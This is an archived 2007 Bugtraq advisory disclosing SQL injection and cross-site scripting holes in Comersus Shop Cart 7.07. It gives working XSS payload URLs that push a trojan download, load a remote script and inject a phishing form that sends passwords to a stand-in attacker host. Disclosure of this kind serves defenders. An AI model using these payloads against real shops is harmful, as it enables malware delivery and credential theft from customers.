Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Comersus Shop Cart 7.07 SQL Injection & XSS

from [DoZ] Network Security [Permanent Link]
Subject: Comersus Shop Cart 7.07 SQL Injection & XSS
Date: 20 Jun 2007 01:51:20 -0000 
 ---> Comersus Shop Cart 7.07 SQL Injection & XSS

Comersus is an active server pages (asp) software for running shopping stores, 
integrated with the rest of your web site. Comersus ASP Cart is free and IT CAN 
BE used for commercial purposes. An attacker may leverage this issue to have 
arbitrary script code execute in the browser of an unsuspecting user in the 
context of the affected site. This may help the attacker steal cookie-based 
authentication credentials and launch other attacks.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Remote: YES
Class: Cross Site Scripting

Vendor: http://www.comersus.com
Product Tested: Comersus Cart 7.07

* Previous versions are also affected & so might 7.08!


Attackers can exploit these issues via a web client.


SQL Hole: /store/comersus_optReviewReadExec.asp?idProduct='

------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in 
query expression 'idProduct=&#39'.

/demo707/includes/databaseFunctions.asp, line 38
------------------------------------------------------------


Cross Site Scripting Pages:

/comersus_customerAuthenticateForm.asp

/comersus_message.asp


Exploit:

1.
path/store/comersus_customerAuthenticateForm.asp?redirectUrl=comersus_customerS
howOrders.asp/XSS

or

/path/store/comersus_customerAuthenticateForm.asp?redirectUrl=comersus_customer
ShowOrders.asp=XSS


2.
http://www.site.com/path/store/comersus_message.asp?message=XSS


Posible Cross Site Scripting Exploits


1. Trojan or Worms!

https://www.site.com/path/store/comersus_customerAuthenticateForm.asp?redirectU
rl="><script>window.location="http://www.Evil_Site.com/Trojan.exe";</script>

2. Any Remote Script!

http://www.site.com/path/store/comersus_message.asp?message=<script
src=http://www.Site.com/Evil_Script.js></script>

3. Phishing!

http://www.site.com/path/store/comersus_message.asp?message=<form%20action="htt
p://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="u
sername"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2
0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value
="Login"></form>


Pic: http://i15.tinypic.com/4xzcd92.jpg



Only becoming a hacker you can stop a hacker. Were can you learn with out 
having to pay thousands!- http://kit.hackerscenter.com - The most comprehensive 
security pack you will ever find on the net!
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Comersus Shop Cart 7.07 SQL Injection & XSS, DoZ <=
Previous by Date:  New post Topic Hijacking XSS All vBulletin v 3.x.x (2), stormhacker
Next by Date:  [Full-disclosure] FLEA-2007-0027-1: thunderbird, Foresight Linux Essential Announcement Service
Previous by Thread:  New post Topic Hijacking XSS All vBulletin v 3.x.x (2), stormhacker
Next by Thread:  [Full-disclosure] FLEA-2007-0027-1: thunderbird, Foresight Linux Essential Announcement Service
Indexes:  [Date] [Thread] [Top] [All Lists]